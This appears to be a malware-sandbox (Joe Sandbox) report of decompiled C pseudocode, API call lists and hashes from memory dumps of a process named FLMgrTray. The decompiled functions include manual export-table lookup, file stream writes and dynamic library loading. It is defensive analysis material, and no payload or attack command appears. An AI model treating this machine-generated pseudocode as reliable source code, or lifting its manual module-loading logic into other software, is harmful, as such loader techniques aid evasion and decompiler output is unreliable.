                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_iostream@?setstate@?$basic_ios@?sgetc@?$basic_streambuf@D@std@@@1@@Ipfx@?$basic_istream@V?$basic_streambuf@_invalid_parameter_noinfo_noreturnmemcpy
                                                                                        • String ID:
                                                                                        • API String ID: 833692935-0
                                                                                        • Opcode ID: a05276ae1d7b0c49bba6d7e118459b4a6c1a37c648581135bf88d07da6b31706
                                                                                        • Instruction ID: bae0e9b65641159bbce1e6b8d7c8f213dd4115a1736685061e039f341ebc5a97
                                                                                        • Opcode Fuzzy Hash: a05276ae1d7b0c49bba6d7e118459b4a6c1a37c648581135bf88d07da6b31706
                                                                                        • Instruction Fuzzy Hash: 3E517B70900249DFDB14DF94C858BDDBBB9FF08314F1485AEE80AA7291DB75AA94CF90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E0016B6C0(intOrPtr* __ecx, void _a4) {
                                                                                        				intOrPtr* _v8;
                                                                                        				intOrPtr _v12;
                                                                                        				intOrPtr _t38;
                                                                                        				void* _t43;
                                                                                        				int _t50;
                                                                                        				intOrPtr _t52;
                                                                                        				intOrPtr _t57;
                                                                                        				intOrPtr _t58;
                                                                                        				void* _t60;
                                                                                        				intOrPtr* _t61;
                                                                                        				int _t63;
                                                                                        				signed int _t64;
                                                                                        				void* _t67;
                                                                                        				signed int _t68;
                                                                                        				intOrPtr _t69;
                                                                                        				intOrPtr* _t70;
                                                                                        				intOrPtr* _t71;
                                                                                        				intOrPtr* _t73;
                                                                                        				void* _t75;
                                                                                        				void* _t76;
                                                                                        				void* _t78;
                                                                                        
                                                                                        				_t71 =  *__ecx;
                                                                                        				_v8 = __ecx;
                                                                                        				_t38 =  *_t71;
                                                                                        				_t69 =  *((intOrPtr*)(_t71 + 4));
                                                                                        				_v12 = _t69;
                                                                                        				if( *((intOrPtr*)(_t38 + 0x7c)) == 0) {
                                                                                        					L17:
                                                                                        					SetLastError(0x7f);
                                                                                        					return 0;
                                                                                        				} else {
                                                                                        					_t75 =  *((intOrPtr*)(_t38 + 0x78)) + _t69;
                                                                                        					_t63 =  *(_t75 + 0x18);
                                                                                        					if(_t63 == 0) {
                                                                                        						goto L17;
                                                                                        					} else {
                                                                                        						_t58 =  *((intOrPtr*)(_t75 + 0x14));
                                                                                        						if(_t58 == 0) {
                                                                                        							goto L17;
                                                                                        						} else {
                                                                                        							if(_a4 >> 0x10 != 0) {
                                                                                        								if( *(_t71 + 0x30) != 0) {
                                                                                        									L13:
                                                                                        									_t43 = bsearch( &_a4,  *(_t71 + 0x30), _t63, 8, E0016BD10);
                                                                                        									if(_t43 == 0) {
                                                                                        										goto L17;
                                                                                        									} else {
                                                                                        										_t64 =  *(_t43 + 4) & 0x0000ffff;
                                                                                        										_t58 =  *((intOrPtr*)(_t75 + 0x14));
                                                                                        										_t69 = _v12;
                                                                                        										goto L15;
                                                                                        									}
                                                                                        								} else {
                                                                                        									_t73 =  *((intOrPtr*)(_t75 + 0x20)) + _t69;
                                                                                        									_t60 =  *((intOrPtr*)(_t75 + 0x24)) + _t69;
                                                                                        									_t70 = malloc(_t63 * 8);
                                                                                        									_t78 = _t76 + 4;
                                                                                        									 *((intOrPtr*)( *_v8 + 0x30)) = _t70;
                                                                                        									if(_t70 != 0) {
                                                                                        										_t50 =  *(_t75 + 0x18);
                                                                                        										_t67 = 0;
                                                                                        										if(_t50 != 0) {
                                                                                        											do {
                                                                                        												_t52 =  *_t73;
                                                                                        												_t73 = _t73 + 4;
                                                                                        												_t60 = _t60 + 2;
                                                                                        												 *_t70 = _t52 + _v12;
                                                                                        												_t70 = _t70 + 8;
                                                                                        												_t67 = _t67 + 1;
                                                                                        												 *((short*)(_t70 - 4)) =  *((intOrPtr*)(_t60 - 2));
                                                                                        												_t50 =  *(_t75 + 0x18);
                                                                                        											} while (_t67 < _t50);
                                                                                        										}
                                                                                        										_t61 = _v8;
                                                                                        										qsort( *( *_t61 + 0x30), _t50, 8, E0016BD10);
                                                                                        										_t63 =  *(_t75 + 0x18);
                                                                                        										_t76 = _t78 + 0x10;
                                                                                        										_t71 =  *_t61;
                                                                                        										goto L13;
                                                                                        									} else {
                                                                                        										SetLastError(0xe);
                                                                                        										return 0;
                                                                                        									}
                                                                                        								}
                                                                                        							} else {
                                                                                        								_t68 = _a4 & 0x0000ffff;
                                                                                        								_t57 =  *((intOrPtr*)(_t75 + 0x10));
                                                                                        								if(_t68 < _t57) {
                                                                                        									goto L17;
                                                                                        								} else {
                                                                                        									_t64 = _t68 - _t57;
                                                                                        									L15:
                                                                                        									if(_t64 > _t58) {
                                                                                        										goto L17;
                                                                                        									} else {
                                                                                        										return  *((intOrPtr*)( *((intOrPtr*)(_t75 + 0x1c)) + _t64 * 4 + _t69)) + _t69;
                                                                                        									}
                                                                                        								}
                                                                                        							}
                                                                                        						}
                                                                                        					}
                                                                                        				}
                                                                                        			}
























                                                                                        0x0016b6cb
                                                                                        0x0016b6cd
                                                                                        0x0016b6d0
                                                                                        0x0016b6d2
                                                                                        0x0016b6d5
                                                                                        0x0016b6dc
                                                                                        0x0016b7ec
                                                                                        0x0016b7ee
                                                                                        0x0016b7fc
                                                                                        0x0016b6e2
                                                                                        0x0016b6e5
                                                                                        0x0016b6e7
                                                                                        0x0016b6ec
                                                                                        0x00000000
                                                                                        0x0016b6f2
                                                                                        0x0016b6f2
                                                                                        0x0016b6f7
                                                                                        0x00000000
                                                                                        0x0016b6fd
                                                                                        0x0016b705
                                                                                        0x0016b723
                                                                                        0x0016b7ae
                                                                                        0x0016b7bd
                                                                                        0x0016b7c8
                                                                                        0x00000000
                                                                                        0x0016b7ca
                                                                                        0x0016b7ca
                                                                                        0x0016b7ce
                                                                                        0x0016b7d1
                                                                                        0x00000000
                                                                                        0x0016b7d1
                                                                                        0x0016b729
                                                                                        0x0016b736
                                                                                        0x0016b739
                                                                                        0x0016b744
                                                                                        0x0016b746
                                                                                        0x0016b74b
                                                                                        0x0016b750
                                                                                        0x0016b765
                                                                                        0x0016b768
                                                                                        0x0016b76c
                                                                                        0x0016b770
                                                                                        0x0016b770
                                                                                        0x0016b772
                                                                                        0x0016b778
                                                                                        0x0016b77b
                                                                                        0x0016b77d
                                                                                        0x0016b784
                                                                                        0x0016b785
                                                                                        0x0016b789
                                                                                        0x0016b78c
                                                                                        0x0016b770
                                                                                        0x0016b790
                                                                                        0x0016b7a0
                                                                                        0x0016b7a6
                                                                                        0x0016b7a9
                                                                                        0x0016b7ac
                                                                                        0x00000000
                                                                                        0x0016b752
                                                                                        0x0016b754
                                                                                        0x0016b762
                                                                                        0x0016b762
                                                                                        0x0016b750
                                                                                        0x0016b707
                                                                                        0x0016b70a
                                                                                        0x0016b70d
                                                                                        0x0016b712
                                                                                        0x00000000
                                                                                        0x0016b718
                                                                                        0x0016b718
                                                                                        0x0016b7d4
                                                                                        0x0016b7d6
                                                                                        0x00000000
                                                                                        0x0016b7d8
                                                                                        0x0016b7e9
                                                                                        0x0016b7e9
                                                                                        0x0016b7d6
                                                                                        0x0016b712
                                                                                        0x0016b705
                                                                                        0x0016b6f7
                                                                                        0x0016b6ec

                                                                                        APIs
                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 0016B73B
                                                                                        • SetLastError.KERNEL32(0000000E), ref: 0016B754
                                                                                        • SetLastError.KERNEL32(0000007F), ref: 0016B7EE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$malloc
                                                                                        • String ID:
                                                                                        • API String ID: 3537865459-0
                                                                                        • Opcode ID: a3f8dfa41d78dc1dc28765f14952664082304c213efcbebd4b5a3236ac2a8eac
                                                                                        • Instruction ID: 151282b891a71d99a46de5e0d7b1eb57c8530ad99492770355a4fd4aae456c8a
                                                                                        • Opcode Fuzzy Hash: a3f8dfa41d78dc1dc28765f14952664082304c213efcbebd4b5a3236ac2a8eac
                                                                                        • Instruction Fuzzy Hash: DE41C0397006069FCB24DF68D8C0AAAB7F5FF88311B144569E906CB691E730FDA5CB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,2C80D730,00000000,00168233,?,0000000A,00168233,00000001), ref: 00169198
                                                                                        • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,0000000A,00168233,00000001), ref: 001691DB
                                                                                        • ?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,0000000A,00168233,00000001), ref: 001691FE
                                                                                        • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000000,00000000,?,0000000A,00168233,00000001), ref: 00169270
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: D@std@@@std@@U?$char_traits@$?sbumpc@?$basic_streambuf@?setstate@?$basic_ios@?sgetc@?$basic_streambuf@Ipfx@?$basic_istream@
                                                                                        • String ID:
                                                                                        • API String ID: 926534625-0
                                                                                        • Opcode ID: a02050e08772b22bba025a7bb4eb99b7fe1049d3c06b378d90ca0c587f0db9e6
                                                                                        • Instruction ID: edfc8f2766f31eba03a939800d2a239195ac59f01d23743fffccd158368473d1
                                                                                        • Opcode Fuzzy Hash: a02050e08772b22bba025a7bb4eb99b7fe1049d3c06b378d90ca0c587f0db9e6
                                                                                        • Instruction Fuzzy Hash: CA417534600244DFCB04CF59C9A8AA9BBF9EF59314F25419DE8169B7A1C771EA41CB80
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 58%
                                                                                        			E00168870(void* __ebx, intOrPtr* __ecx, void* __edi) {
                                                                                        				char _v8;
                                                                                        				char _v16;
                                                                                        				signed int _v20;
                                                                                        				char _v44;
                                                                                        				char _v68;
                                                                                        				char _v92;
                                                                                        				char _v116;
                                                                                        				char _v140;
                                                                                        				char _v164;
                                                                                        				char _v176;
                                                                                        				char _v188;
                                                                                        				signed int _t24;
                                                                                        				signed int _t25;
                                                                                        				void* _t30;
                                                                                        				void* _t32;
                                                                                        				void* _t34;
                                                                                        				void* _t39;
                                                                                        				void* _t41;
                                                                                        				void* _t43;
                                                                                        				void* _t45;
                                                                                        				intOrPtr* _t51;
                                                                                        				intOrPtr _t53;
                                                                                        				void* _t55;
                                                                                        				signed int _t59;
                                                                                        				void* _t60;
                                                                                        				intOrPtr _t63;
                                                                                        				void* _t65;
                                                                                        
                                                                                        				_t55 = __edi;
                                                                                        				_t45 = __ebx;
                                                                                        				_t57 = _t59;
                                                                                        				_push(0xffffffff);
                                                                                        				_push(E0018CFD6);
                                                                                        				_push( *[fs:0x0]);
                                                                                        				_t60 = _t59 - 0xac;
                                                                                        				_t24 =  *0x19d05c; // 0x2c80d730
                                                                                        				_t25 = _t24 ^ _t59;
                                                                                        				_v20 = _t25;
                                                                                        				_push(_t25);
                                                                                        				 *[fs:0x0] =  &_v16;
                                                                                        				_t53 =  *((intOrPtr*)(__ecx + 4));
                                                                                        				_t27 =  *((intOrPtr*)(__ecx));
                                                                                        				_t63 = _t53;
                                                                                        				if(_t63 < 0 || _t63 <= 0 && _t27 <= 0x7fffffff) {
                                                                                        					_t65 = _t53 - 0xffffffff;
                                                                                        					if(_t65 > 0 || _t65 >= 0 && _t27 >= 0x80000000) {
                                                                                        						 *[fs:0x0] = _v16;
                                                                                        						return E001755F4(_v20 ^ _t57);
                                                                                        					} else {
                                                                                        						goto L8;
                                                                                        					}
                                                                                        				} else {
                                                                                        					L9();
                                                                                        					_t39 = E001689B0(_t45, _t53, _t55,  &_v44, _t27, _t53);
                                                                                        					_v8 = 0;
                                                                                        					_t41 = E00168580( &_v68, "cpr::Timeout: timeout value overflow: ", _t39);
                                                                                        					_v8 = 1;
                                                                                        					_t43 = E00168520( &_v92, _t41, " ms.");
                                                                                        					_t60 = _t60 + 0x24;
                                                                                        					_v8 = 2;
                                                                                        					E00168700( &_v176, _t43);
                                                                                        					_push(0x19884c);
                                                                                        					_t27 =  &_v176;
                                                                                        					_push( &_v176);
                                                                                        					L0018C89A();
                                                                                        					L8:
                                                                                        					L9();
                                                                                        					_t30 = E001689B0(_t45, _t53, _t55,  &_v116, _t27, _t53);
                                                                                        					_v8 = 3;
                                                                                        					_t32 = E00168580( &_v140, "cpr::Timeout: timeout value underflow: ", _t30);
                                                                                        					_v8 = 4;
                                                                                        					_t34 = E00168520( &_v164, _t32, " ms.");
                                                                                        					_t51 =  &_v188;
                                                                                        					_v8 = 5;
                                                                                        					E001687D0(_t51, _t34);
                                                                                        					_push(0x198888);
                                                                                        					_push( &_v188);
                                                                                        					L0018C89A();
                                                                                        					asm("int3");
                                                                                        					asm("int3");
                                                                                        					asm("int3");
                                                                                        					asm("int3");
                                                                                        					asm("int3");
                                                                                        					asm("int3");
                                                                                        					asm("int3");
                                                                                        					asm("int3");
                                                                                        					asm("int3");
                                                                                        					asm("int3");
                                                                                        					asm("int3");
                                                                                        					asm("int3");
                                                                                        					return  *_t51;
                                                                                        				}
                                                                                        			}






























                                                                                        0x00168870
                                                                                        0x00168870
                                                                                        0x00168871
                                                                                        0x00168873
                                                                                        0x00168875
                                                                                        0x00168880
                                                                                        0x00168881
                                                                                        0x00168887
                                                                                        0x0016888c
                                                                                        0x0016888e
                                                                                        0x00168891
                                                                                        0x00168895
                                                                                        0x0016889b
                                                                                        0x0016889e
                                                                                        0x001688a0
                                                                                        0x001688a2
                                                                                        0x001688ad
                                                                                        0x001688b0
                                                                                        0x001688be
                                                                                        0x001688d3
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x001688d4
                                                                                        0x001688d4
                                                                                        0x001688df
                                                                                        0x001688e8
                                                                                        0x001688f5
                                                                                        0x00168903
                                                                                        0x00168908
                                                                                        0x0016890d
                                                                                        0x00168917
                                                                                        0x0016891b
                                                                                        0x00168920
                                                                                        0x00168925
                                                                                        0x0016892b
                                                                                        0x0016892c
                                                                                        0x00168931
                                                                                        0x00168931
                                                                                        0x0016893c
                                                                                        0x00168948
                                                                                        0x00168955
                                                                                        0x00168966
                                                                                        0x0016896b
                                                                                        0x00168974
                                                                                        0x0016897a
                                                                                        0x0016897e
                                                                                        0x00168983
                                                                                        0x0016898e
                                                                                        0x0016898f
                                                                                        0x00168994
                                                                                        0x00168995
                                                                                        0x00168996
                                                                                        0x00168997
                                                                                        0x00168998
                                                                                        0x00168999
                                                                                        0x0016899a
                                                                                        0x0016899b
                                                                                        0x0016899c
                                                                                        0x0016899d
                                                                                        0x0016899e
                                                                                        0x0016899f
                                                                                        0x001689a5
                                                                                        0x001689a5

                                                                                        APIs
                                                                                        • _CxxThrowException.VCRUNTIME140(?,0019884C,00000000,?,?,?,?,?,?,?,?,2C80D730), ref: 0016892C
                                                                                        • _CxxThrowException.VCRUNTIME140(?,00198888,00000000,?,?,?,?,?,?,?,?,2C80D730), ref: 0016898F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionThrow
                                                                                        • String ID: ms.$cpr::Timeout: timeout value overflow: $cpr::Timeout: timeout value underflow:
                                                                                        • API String ID: 432778473-2902620869
                                                                                        • Opcode ID: a4be99d622d95288da1d56ac680ca055dadf3c64b02b17b4a4517727d87c0431
                                                                                        • Instruction ID: e53a2db88a344d1e80a180306f1e617578962c289ce48ec247cabbf79efa8398
                                                                                        • Opcode Fuzzy Hash: a4be99d622d95288da1d56ac680ca055dadf3c64b02b17b4a4517727d87c0431
                                                                                        • Instruction Fuzzy Hash: 0731C2B2900248AADF11EBA4CC45FDFB3BCAB55714F10435AB815E3181EF34A7548B66
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 20%
                                                                                        			E00185680(void* __ebx, char _a4, signed int _a24, intOrPtr* _a28) {
                                                                                        				char _v8;
                                                                                        				char _v16;
                                                                                        				intOrPtr _v112;
                                                                                        				char _v188;
                                                                                        				char _v192;
                                                                                        				signed int _t29;
                                                                                        				void* _t35;
                                                                                        				intOrPtr _t40;
                                                                                        				intOrPtr _t43;
                                                                                        				void* _t44;
                                                                                        				signed int _t61;
                                                                                        				void* _t62;
                                                                                        				intOrPtr* _t64;
                                                                                        				char _t65;
                                                                                        				signed int _t67;
                                                                                        
                                                                                        				_push(0xffffffff);
                                                                                        				_push(E0018E833);
                                                                                        				_push( *[fs:0x0]);
                                                                                        				_t29 =  *0x19d05c; // 0x2c80d730
                                                                                        				_push(_t29 ^ _t67);
                                                                                        				 *[fs:0x0] =  &_v16;
                                                                                        				_t64 = _a28;
                                                                                        				_v8 = 0;
                                                                                        				E001849B0( &_v192, 1);
                                                                                        				_t34 =  >=  ? _a4 :  &_a4;
                                                                                        				_v8 = 1;
                                                                                        				_t35 = E00184F10(__ebx,  &_v188,  >=  ? _a4 :  &_a4, 0x2a, 0x40);
                                                                                        				_push(0);
                                                                                        				if(_t35 != 0) {
                                                                                        					__imp__?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z(0);
                                                                                        				} else {
                                                                                        					__imp__?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z(2);
                                                                                        				}
                                                                                        				if(_v112 == 0) {
                                                                                        					_t65 = 0;
                                                                                        					goto L9;
                                                                                        				} else {
                                                                                        					_t43 =  *((intOrPtr*)(_t64 + 0x10));
                                                                                        					if( *((intOrPtr*)(_t64 + 0x14)) >= 0x10) {
                                                                                        						_t64 =  *_t64;
                                                                                        					}
                                                                                        					__imp__?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBD_J@Z(_t64, _t43, 0);
                                                                                        					_t65 = 1;
                                                                                        					_t44 = E0016A740( &_v188);
                                                                                        					if(_t44 == 0) {
                                                                                        						__imp__?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z(2, _t44);
                                                                                        					}
                                                                                        					L9:
                                                                                        					E00184A90( &_v192);
                                                                                        					_t61 = _a24;
                                                                                        					if(_t61 >= 8) {
                                                                                        						_t55 = _a4;
                                                                                        						_t62 = 2 + _t61 * 2;
                                                                                        						_t40 = _t55;
                                                                                        						if(_t62 >= 0x1000) {
                                                                                        							_t26 = _t55 - 4; // 0x37ad
                                                                                        							_t55 =  *_t26;
                                                                                        							_t62 = _t62 + 0x23;
                                                                                        							if(_t40 > 0x1f) {
                                                                                        								__imp___invalid_parameter_noinfo_noreturn();
                                                                                        							}
                                                                                        						}
                                                                                        						_push(_t62);
                                                                                        						E00175733(_t40, _t55);
                                                                                        					}
                                                                                        					 *[fs:0x0] = _v16;
                                                                                        					return _t65;
                                                                                        				}
                                                                                        			}


















                                                                                        0x00185683
                                                                                        0x00185685
                                                                                        0x00185690
                                                                                        0x00185698
                                                                                        0x0018569f
                                                                                        0x001856a3
                                                                                        0x001856a9
                                                                                        0x001856b4
                                                                                        0x001856bb
                                                                                        0x001856c9
                                                                                        0x001856d6
                                                                                        0x001856da
                                                                                        0x001856ed
                                                                                        0x001856f2
                                                                                        0x00185704
                                                                                        0x001856f4
                                                                                        0x001856f8
                                                                                        0x001856f8
                                                                                        0x0018570e
                                                                                        0x0018575b
                                                                                        0x00000000
                                                                                        0x00185710
                                                                                        0x00185714
                                                                                        0x00185717
                                                                                        0x00185719
                                                                                        0x00185719
                                                                                        0x00185725
                                                                                        0x00185731
                                                                                        0x00185736
                                                                                        0x0018573d
                                                                                        0x00185753
                                                                                        0x00185753
                                                                                        0x0018575d
                                                                                        0x00185763
                                                                                        0x00185768
                                                                                        0x0018576e
                                                                                        0x00185770
                                                                                        0x00185773
                                                                                        0x0018577a
                                                                                        0x00185782
                                                                                        0x00185784
                                                                                        0x00185784
                                                                                        0x00185787
                                                                                        0x00185792
                                                                                        0x00185794
                                                                                        0x00185794
                                                                                        0x00185792
                                                                                        0x0018579a
                                                                                        0x0018579c
                                                                                        0x001857a1
                                                                                        0x001857a9
                                                                                        0x001857b5
                                                                                        0x001857b5

                                                                                        APIs
                                                                                          • Part of subcall function 001849B0: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(2C80D730), ref: 001849F2
                                                                                          • Part of subcall function 001849B0: ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140(00000005,00000000,00000000,2C80D730), ref: 00184A10
                                                                                          • Part of subcall function 001849B0: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140 ref: 00184A3A
                                                                                          • Part of subcall function 001849B0: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXXZ.MSVCP140 ref: 00184A54
                                                                                          • Part of subcall function 00184F10: ?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(2C80D730,?,?,2C80D730,?,?,2C80D730,00000001), ref: 00184F4C
                                                                                          • Part of subcall function 00184F10: ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(2C80D730,00000000,00000001,2C80D730,?,?,2C80D730,00000001), ref: 00184F68
                                                                                          • Part of subcall function 00184F10: ?always_noconv@codecvt_base@std@@QBE_NXZ.MSVCP140 ref: 00184F82
                                                                                        • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000002,00000000,00181ED3,0000002A,00000040,00000001,2C80D730,00000001), ref: 001856F8
                                                                                        • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000000,00000000,00181ED3,0000002A,00000040,00000001,2C80D730,00000001), ref: 00185704
                                                                                        • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBD_J@Z.MSVCP140(?,00000000,00000000), ref: 00185725
                                                                                        • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000002,00000000), ref: 00185753
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00185794
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: U?$char_traits@$D@std@@@std@@$?setstate@?$basic_ios@$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@?always_noconv@codecvt_base@std@@?clear@?$basic_ios@?getloc@?$basic_streambuf@?write@?$basic_ostream@D@std@@@1@_Fiopen@std@@Init@?$basic_streambuf@U_iobuf@@V12@V?$basic_streambuf@Vlocale@2@_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 3475611875-0
                                                                                        • Opcode ID: ee089722d958174445f19ef079a7786f05004c88eb3495c1994255f6b2846d87
                                                                                        • Instruction ID: 176bad85d9cd73946a9ec0460b1be1382ea4e3816d190b32d5d8c8fe87254160
                                                                                        • Opcode Fuzzy Hash: ee089722d958174445f19ef079a7786f05004c88eb3495c1994255f6b2846d87
                                                                                        • Instruction Fuzzy Hash: 2F31C235A00608DFDB24EF64DC85F9D77B6EB14304F4081A9F90A97290EB74AB84CF51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • LoadLibraryW.KERNEL32(?,?,00000000), ref: 00171922
                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00171AD3
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00171AE8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                        • String ID: 6)'#5;I
                                                                                        • API String ID: 145871493-2785597787
                                                                                        • Opcode ID: 68c4953f7f78c8716b31d0f31809d034af86d003232632b37abbbfa87eb08d4f
                                                                                        • Instruction ID: 8b497dcb12fd89894d744d8fc94ba6d36f60ed9ce1fa93c79aaa0543a68bb5ba
                                                                                        • Opcode Fuzzy Hash: 68c4953f7f78c8716b31d0f31809d034af86d003232632b37abbbfa87eb08d4f
                                                                                        • Instruction Fuzzy Hash: 5051E866D256895FE703DB79D8011D9F7B8AF7B281B54D31BF80076962FB20A6C38640
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 98%
                                                                                        			E00187910(signed int _a4, signed int _a8) {
                                                                                        				int _v8;
                                                                                        				intOrPtr _v12;
                                                                                        				signed int _v16;
                                                                                        				intOrPtr _v20;
                                                                                        				void* __esi;
                                                                                        				void* _t147;
                                                                                        				signed int _t152;
                                                                                        				intOrPtr* _t153;
                                                                                        				int _t154;
                                                                                        				intOrPtr _t155;
                                                                                        				signed int _t156;
                                                                                        				int _t157;
                                                                                        				int _t162;
                                                                                        				intOrPtr _t172;
                                                                                        				intOrPtr _t173;
                                                                                        				int _t178;
                                                                                        				signed int _t181;
                                                                                        				signed int _t183;
                                                                                        				intOrPtr _t184;
                                                                                        				intOrPtr _t196;
                                                                                        				signed int _t199;
                                                                                        				signed int _t200;
                                                                                        				intOrPtr _t206;
                                                                                        				void* _t208;
                                                                                        				intOrPtr _t215;
                                                                                        				intOrPtr _t229;
                                                                                        				signed int _t230;
                                                                                        				intOrPtr _t233;
                                                                                        				signed int _t234;
                                                                                        				signed int _t235;
                                                                                        				int _t236;
                                                                                        				int _t237;
                                                                                        				void* _t238;
                                                                                        				signed int _t242;
                                                                                        				int _t243;
                                                                                        				signed int _t245;
                                                                                        				int _t247;
                                                                                        				int _t248;
                                                                                        				int _t253;
                                                                                        				signed int _t254;
                                                                                        				int _t267;
                                                                                        				int _t268;
                                                                                        				void* _t270;
                                                                                        				void* _t271;
                                                                                        				int _t272;
